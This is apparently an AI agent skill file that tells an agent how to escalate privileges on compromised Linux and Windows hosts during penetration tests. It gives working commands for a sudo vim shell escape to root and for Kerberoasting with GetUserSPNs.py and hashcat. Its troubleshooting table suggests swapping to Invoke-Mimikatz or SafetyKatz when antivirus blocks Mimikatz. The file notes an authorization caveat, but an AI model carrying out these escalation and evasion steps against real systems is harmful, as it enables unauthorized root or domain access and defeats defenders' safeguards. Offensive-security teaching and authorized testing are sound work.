This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.
Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.
Inputs/Prerequisites
Initial low-privilege shell access on target system
Have initial shell access before attempting escalation
Verify target OS and environment before selecting technique
Use appropriate tool for domain vs local escalation
Must Not:
Attempt techniques on production systems without authorization
Leave persistence mechanisms without client approval
Ignore detection mechanisms (EDR, SIEM)
Should:
Enumerate thoroughly before exploitation
Document all successful escalation paths
Clean up artifacts after engagement
Examples
Example 1: Linux Sudo to Root
# Check sudo permissions
$ sudo -l
User www-data may run the following commands:
(root) NOPASSWD: /usr/bin/vim
# Exploit vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)
Example 2: Windows Kerberoasting
# Request service tickets
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
# Crack with hashcat
$ hashcat -m 13100 hashes.txt rockyou.txt
Troubleshooting
Issue
Solution
sudo -l requires password
Try other enumeration (SUID, cron, capabilities)
Mimikatz blocked by AV
Use Invoke-Mimikatz or SafetyKatz
Kerberoasting returns no hashes
Check for service accounts with SPNs
Token impersonation fails
Verify SeImpersonatePrivilege is present
NFS mount fails
Check NFS version compatibility (vers=2,3,4)
Additional Resources
For detailed enumeration scripts, use:
LinPEAS: Linux privilege escalation enumeration
WinPEAS: Windows privilege escalation enumeration
BloodHound: Active Directory attack path mapping
GTFOBins: Unix binary exploitation reference
When to Use
This skill is applicable to execute the workflow or actions described in the overview.